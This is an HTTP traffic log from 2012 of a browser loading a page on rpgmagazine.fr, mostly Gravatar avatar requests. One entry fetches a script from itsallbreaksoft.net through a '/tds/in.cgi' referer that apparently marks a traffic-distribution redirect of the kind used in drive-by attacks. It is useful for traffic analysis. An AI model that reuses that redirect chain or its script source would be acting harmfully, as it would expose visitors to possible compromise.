Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1845331828
Content-Length: 5155
GET /avatar/0b85393d47fc021276561b8336237d6a?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/0b85393d47fc021276561b8336237d6a?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E9)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163551
Content-Length: 5479
GET /avatar/1de48fba3a72d0bb52fdc0fa316a9242?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/1de48fba3a72d0bb52fdc0fa316a9242?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1954690957
Content-Length: 4860
GET /avatar/67119e34649d482c6617805af14d8307?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/67119e34649d482c6617805af14d8307?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3552576108
Content-Length: 5821
GET /avatar/55f892d9e75d697359a5da3ea422129e?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/55f892d9e75d697359a5da3ea422129e?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2974256303
Content-Length: 6013
GET /avatar/5986495496a262a6e3a40c80431c3528?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/5986495496a262a6e3a40c80431c3528?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FA)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826818193
Content-Length: 4317
GET /avatar/00e1f97c6eedde4935c8084df810bb05?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/00e1f97c6eedde4935c8084df810bb05?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FA)
Source-Age: 1500
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1845331855 1844617634
Content-Length: 3764
GET /avatar/fc857857383e54944850fd22105ad932?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/fc857857383e54944850fd22105ad932?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237991
Content-Length: 5907
GET /avatar/5ec88fddc59a9e05cc32a97598d32ef0?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/5ec88fddc59a9e05cc32a97598d32ef0?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E9)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237990
Content-Length: 6337
GET /avatar/66d384910fa4c1233a6cfe6b07535245?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/66d384910fa4c1233a6cfe6b07535245?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/4667)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718764
Content-Length: 4202
GET /js/standard.js?rte=1&tm=2&dn=itsallbreaksoft.net&tid=1016 HTTP/1.1

Host: itsallbreaksoft.net
GET /js/standard.js?rte=1&amp;tm=2&amp;dn=itsallbreaksoft.net&amp;tid=1016 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&amp;default_keyword=notdefine
Cookie: SessionID=a93fc49b-9ccf-4aca-bd91-bbcaa7de4e08; VisitorID=ff005920-a7fc-4f99-a824-5d985bf27bf3&amp;Exp=11/6/2015 3:50:36 AM
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Cache-Control: private
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Nov 2012 11:50:36 GMT
Content-Length: 569
GET /avatar/50e6c09566c2b594b2bf0d2eaf894392?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/50e6c09566c2b594b2bf0d2eaf894392?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 1499
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237993 4275321805
Content-Length: 5416
GET /avatar/a9da79e835c0b353b1ce202ab8642ea3?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/a9da79e835c0b353b1ce202ab8642ea3?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E4)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276238002
Content-Length: 6797
GET /avatar/09921392c813f1d987375dab333f0a3f?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/09921392c813f1d987375dab333f0a3f?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46ED)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2254119420
Content-Length: 4575
GET /avatar/51e67ef49e7946f5173d0a0599466edf?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/51e67ef49e7946f5173d0a0599466edf?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1845331872
Content-Length: 6245
GET /avatar/ddc78ec865cc5981cf08b2653532d027?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/ddc78ec865cc5981cf08b2653532d027?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F8)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718624
Content-Length: 3861
GET /avatar/bd9ffce3731991887c8689316214095b?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/bd9ffce3731991887c8689316214095b?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3462923066
Content-Length: 6031
GET /avatar/032f8452508a72ae8e2c9c44bf38095c?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/032f8452508a72ae8e2c9c44bf38095c?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099689
Content-Length: 5391
GET /avatar/493701cec615cfd41af98bdecf9b8b39?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/493701cec615cfd41af98bdecf9b8b39?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/4679)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460273122
Content-Length: 6454
GET /avatar/d6192e535acd6f4b21ce8d1a52604057?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/d6192e535acd6f4b21ce8d1a52604057?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718637
Content-Length: 4478
GET /avatar/45afa6d02f1b02a91a13c17e6e6fa8bc?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/45afa6d02f1b02a91a13c17e6e6fa8bc?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2254119439
Content-Length: 4224
GET /avatar/f93a2986acfeb1171187f380f7b958e9?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/f93a2986acfeb1171187f380f7b958e9?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448555
Content-Length: 5072
GET /avatar/17852a70bf8c9f40ee3a00fe1c1a9d9e?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/17852a70bf8c9f40ee3a00fe1c1a9d9e?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448557
Content-Length: 4215
GET /avatar/9f24b21bff67f445b7250ae6fe0cdde3?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/9f24b21bff67f445b7250ae6fe0cdde3?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F4)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099701
Content-Length: 4531
GET /avatar/ed42067a265ed64b9f1fdc8dd2aafd12?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/ed42067a265ed64b9f1fdc8dd2aafd12?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E4)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460273131
Content-Length: 5170
GET /avatar/fe4bac3f708f69d48f65e3d7af2dfff4?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/fe4bac3f708f69d48f65e3d7af2dfff4?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099707
Content-Length: 5932
GET /avatar/0e475c99eb0abe69470f1ba067713861?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/0e475c99eb0abe69470f1ba067713861?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099703
Content-Length: 3895
GET /avatar/aeb13a4087a4ccf3168e4f46ae5ef5cf?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/aeb13a4087a4ccf3168e4f46ae5ef5cf?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
